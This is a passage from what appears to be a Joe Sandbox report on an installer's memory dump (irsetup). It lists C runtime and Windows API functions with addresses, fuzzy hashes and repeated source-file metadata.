Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
Instruction ID: d9038f30b84bd084f134f145b4ea9161b6956bb9982c7eca4ea7920d869c151e
Opcode Fuzzy Hash: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
Instruction Fuzzy Hash: 20310432610A9841E793AF26A8427EE3651B789BE0F52C616BE650B7D2CF38C6098700

Function 000000018002C68C Relevance: 12.1, APIs: 8, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002C6AB
_errno.LIBCMT ref: 000000018002C6B4
__doserrno.LIBCMT ref: 000000018002C704
_errno.LIBCMT ref: 000000018002C70B

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
Instruction ID: ec033c54c6d7d521fc6e23a01929881988fa191f7bf2fc9d76832262eb4df226
Opcode Fuzzy Hash: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
Instruction Fuzzy Hash: 5131E132614ADC41E7A3AF35A841BAE3751B7897E0F65C616FA25077D2CF38C6088B02

Function 00000001800305E8 Relevance: 12.0, APIs: 8, Instructions: 50synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030612
GetExitCodeProcess.KERNEL32 ref: 0000000180030624
GetLastError.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030633
_errno.LIBCMT ref: 000000018003063E
__doserrno.LIBCMT ref: 0000000180030649
GetLastError.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030656
CloseHandle.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 000000018003066A
_errno.LIBCMT ref: 000000018003067D

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno
String ID:
API String ID: 280878599-0
Opcode ID: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
Instruction ID: 68bd96f5714e3ffe11f7f818daa76e97712db3409049de95b658a461dfe5d033
Opcode Fuzzy Hash: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
Instruction Fuzzy Hash: 1511003060168882EBE35FA5A5503BE2760A78DBF0F26C310F976037E9CE38C659CB01

Function 000000018002C830 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 000000018002C855

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

GetFileType.KERNEL32 ref: 000000018002C9D2

Strings

@, xrefs: 000000018002CACD

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID: @
API String ID: 1527402494-2766056989
Opcode ID: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
Instruction ID: 230c68c653191f54178d303bf2b0e4d8cf0cc3789bfed5754acc8c55ed461bfd
Opcode Fuzzy Hash: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
Instruction Fuzzy Hash: 43916232214A8881E7A3CB29D448BA827A5F3097F8F65C715E679473E1DF79C94AC313

Function 000000018001FBE8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018001FC28
_errno.LIBCMT ref: 000000018001FDE2

Strings

0, xrefs: 000000018001FD21
0, xrefs: 000000018001FCF3
-, xrefs: 000000018001FCBA
+, xrefs: 000000018001FCC5

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: +$-$0$0
API String ID: 3432092939-699404926
Opcode ID: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
Instruction ID: cdf1d1b669f77c7e48de24e0b0f5a27944c92b146814c4b507a9b0648c28b355
Opcode Fuzzy Hash: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
Instruction Fuzzy Hash: 2B71D332904E8C81F7F78A25E4553FA26D2B7897D4F29C116FF56023D1DF68CA498342

Function 000000018000DA70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180021DF4: _errno.LIBCMT ref: 0000000180021D4F

_errno.LIBCMT ref: 000000018000DAC6

Part of subcall function 000000018000D9B0: _fread_nolock.LIBCMT ref: 000000018000DA0F

Strings

invalid format, xrefs: 000000018000DC1E
invalid option, xrefs: 000000018000DB9E
%lf, xrefs: 000000018000DBC3
too many arguments, xrefs: 000000018000DB08

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_fread_nolock
String ID: %lf$invalid format$invalid option$too many arguments
API String ID: 1771911937-3304058045
Opcode ID: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
Instruction ID: 4ecbb218ed77667f7209945df211a99de47e7cbe1f5077c6477dde9f3f5f1065
Opcode Fuzzy Hash: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
Instruction Fuzzy Hash: 9A51F13120464C86FAE7E62656517FE73416B8EBE0F85C112BD060B7C7DE28CB0E8391

Function 0000000180033098 Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800330B1
_errno.LIBCMT ref: 00000001800330FE

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
Instruction ID: 529fb29261052428e6b08158eb4e60c077481b13b416dc635a86f518e286f846
Opcode Fuzzy Hash: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
Instruction Fuzzy Hash: 1931F631B10A8C45F7A7AF79A8963EF2751A7897D0F16C61DBA25073D2CF788608C704

Function 00000001800213B4 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800213D7

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errno
String ID:
API String ID: 3485708101-0
Opcode ID: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
Instruction ID: a4978cb5b150d70a31ac02c29fe7af899a0e20301038a663c4a8e9806da71e5f
Opcode Fuzzy Hash: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
Instruction Fuzzy Hash: 4421D73171068886F793BB25D4113EE6351B7997D5F14C512BA5D0BAC3DF78CA08C701

Function 000000018002D20C Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 000000018002D233

Part of subcall function 000000018002F154: GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217

Part of subcall function 000000018002082C: ExitProcess.KERNEL32 ref: 000000018002083B

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

_errno.LIBCMT ref: 000000018002D275
_lock.LIBCMT ref: 000000018002D289
free.LIBCMT ref: 000000018002D2AB
_errno.LIBCMT ref: 000000018002D2B0
LeaveCriticalSection.KERNEL32(?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC,?,?,?,000000018001E8ED), ref: 000000018002D2D6

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
String ID:
API String ID: 1024173049-0
Opcode ID: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
Instruction ID: 6158d1e52bbdfd4d1479ce80147eb334c54af6b62df8d85375debdae957d05bd
Opcode Fuzzy Hash: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
Instruction Fuzzy Hash: CD215831615A4C82F6E7AB50A9403EA6395A79D7C4F05C026BA4A877C6CFB8CA4C8340

Function 000000018002FEF8 Relevance: 10.5, APIs: 7, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002FF05
_errno.LIBCMT ref: 000000018002FF0D

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

GetFileAttributesA.KERNEL32 ref: 000000018002FF3A
GetLastError.KERNEL32 ref: 000000018002FF45
_errno.LIBCMT ref: 000000018002FF52

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$AttributesDecodeErrorFileLastPointer__doserrno
String ID:
API String ID: 24609805-0
Opcode ID: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
Instruction ID: 62db423ae1bf48e4f4470d80ab43833ba7cfcbac53acf032b2a4a70ed809b53f
Opcode Fuzzy Hash: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
Instruction Fuzzy Hash: 2B019E7161058C46FBF36B789A123FE23905F8E3D0F84C635FA15423CACE284A088711

Function 0000000180026160 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 000000018002618C
_set_exp.LIBCMT ref: 000000018002624A
_ctrlfp.LIBCMT ref: 000000018002628C

Part of subcall function 0000000180034090: _umatherr.LIBCMT ref: 00000001800340C9

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _ctrlfp$_set_exp_umatherr
String ID:
API String ID: 3511029064-0
Opcode ID: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
Instruction ID: b049e6e4e90f587d1ae26f8248ab9d02cc25cde2fa3ace03e7f94499fe5c5a36
Opcode Fuzzy Hash: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
Instruction Fuzzy Hash: 33413871E08E4C85F6A35A3489513EEA385DF9E3D5F11C325B9022B6F6DF18969E4300

Function 000000018003ABF8 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

__initconout.LIBCMT ref: 000000018003AC26

Part of subcall function 000000018003E2DC: CreateFileA.KERNEL32 ref: 000000018003E305

WriteConsoleW.KERNEL32 ref: 000000018003AC52
GetLastError.KERNEL32 ref: 000000018003AC6D
GetConsoleOutputCP.KERNEL32(?,?,?,?,0000000180032960,?,?,?,00000001,00000000,?,00000001,0000000180032E64,?,00000000,?), ref: 000000018003AC7F
WideCharToMultiByte.KERNEL32 ref: 000000018003ACB2
WriteConsoleA.KERNEL32 ref: 000000018003ACD8

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
String ID:
API String ID: 2210154019-0
Opcode ID: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
Instruction ID: 99c728c995c363288e4645a8cfd7ec9812841acb19d10564c0c81df42c91df12
Opcode Fuzzy Hash: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
Instruction Fuzzy Hash: FF317135614A8C86FBA2CB10E8443A76361F78A7B8F619315F66A066E4CF7DC78D8740

Function 000000018002C254 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C25E
FlsGetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C26C
SetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C2C4

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

FlsSetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C298
free.LIBCMT ref: 000000018002C2BB

Part of subcall function 000000018002C1A0: _lock.LIBCMT ref: 000000018002C1F0
Part of subcall function 000000018002C1A0: _lock.LIBCMT ref: 000000018002C210

GetCurrentThreadId.KERNEL32 ref: 000000018002C2AC

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
Instruction ID: 0dfceef3c332b8433fd22f826c40fe3083664a76df6c8c25525dd3dfe5458ebd
Opcode Fuzzy Hash: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
Instruction Fuzzy Hash: 63017135201B08C2FBE79BA5A5847A92391AB4CBE0F09C625F926423D5DE38D64D8711

Function 0000000180036640 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000000018003665E

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180036670
free.LIBCMT ref: 0000000180036682
free.LIBCMT ref: 0000000180036694
free.LIBCMT ref: 00000001800366A6
free.LIBCMT ref: 00000001800366B8
free.LIBCMT ref: 00000001800366CA

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
Instruction ID: 4b4e489caf5932047fa857d54ce27d1b13f5d9450eda61c6167a0ffc8242f040
Opcode Fuzzy Hash: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
Instruction Fuzzy Hash: 1F01AD72600C0C91EBE3EB61D4A23F96360A7CC7C8F46C043F51E876A6CE24DB888725

Function 00000001800366D8 Relevance: 7.7, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 0000000180036758
free.LIBCMT ref: 000000018003677F
free.LIBCMT ref: 0000000180036A50
free.LIBCMT ref: 0000000180036A5C

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
Instruction ID: a769455a77138ef5747765841ac36d0ccc4094dbcb8b52754ceed79c47d1f62a
Opcode Fuzzy Hash: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
Instruction Fuzzy Hash: EEB17332714B8885EBA3DF62E4507DAB7A4F789BC4F408126BA8E47795DF38C219C740

Function 0000000180033C78 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000000180033CB2
_set_statfp.LIBCMT ref: 0000000180033CD0
_set_statfp.LIBCMT ref: 0000000180033CF9
_set_statfp.LIBCMT ref: 0000000180033EB8

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
Instruction ID: 12e77770c186e875bdaf3e9738c6c902f4d3ba9da1e990d93e387186277e3745
Opcode Fuzzy Hash: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
Instruction Fuzzy Hash: 0851A832514D8C85F2F79F34B4963EBA351BB4A7D4F12C219BA562A5E0EF348B8D8700

Function 00000001800216AC Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800216D0

Part of subcall function 000000018002D20C: _FF_MSGBANNER.LIBCMT ref: 000000018002D233

_errno.LIBCMT ref: 00000001800216F2
_lock.LIBCMT ref: 0000000180021703
_errno.LIBCMT ref: 000000018002184A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_lock
String ID:
API String ID: 8016435-0
Opcode ID: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
Instruction ID: d9f390f5e57b81c544825edcb0cf6f397babacc6c857381744f7d8a64d4c1da9
Opcode Fuzzy Hash: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
Instruction Fuzzy Hash: 87518F322047888AFBE79B2694417EE63A1F7A8BC5F54C015FE4947B86DF38CA0D8701

Function 000000018002ECF4 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 000000018002ED2D
_exception_enabled.LIBCMT ref: 000000018002ED54

Part of subcall function 000000018002EC38: _set_statfp.LIBCMT ref: 000000018002EC5F
Part of subcall function 000000018002EC38: _set_statfp.LIBCMT ref: 000000018002ECD2

_raise_exc.LIBCMT ref: 000000018002EDB9
_call_matherr.LIBCMT ref: 000000018002EDFC
_ctrlfp.LIBCMT ref: 000000018002EE14

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _ctrlfp_set_statfp$_call_matherr_exception_enabled_raise_exc
String ID:
API String ID: 932658401-0
Opcode ID: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
Instruction ID: 8ea2834ca092981a7e33b9b2295afd33eedbb5ae56d736279697e7e8cc69432a
Opcode Fuzzy Hash: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
Instruction Fuzzy Hash: 8D313D32608EC886D672DB15E4413EBB365FBCE394F154225FA8C5BB58DF39C5498B40

Function 000000018002F404 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

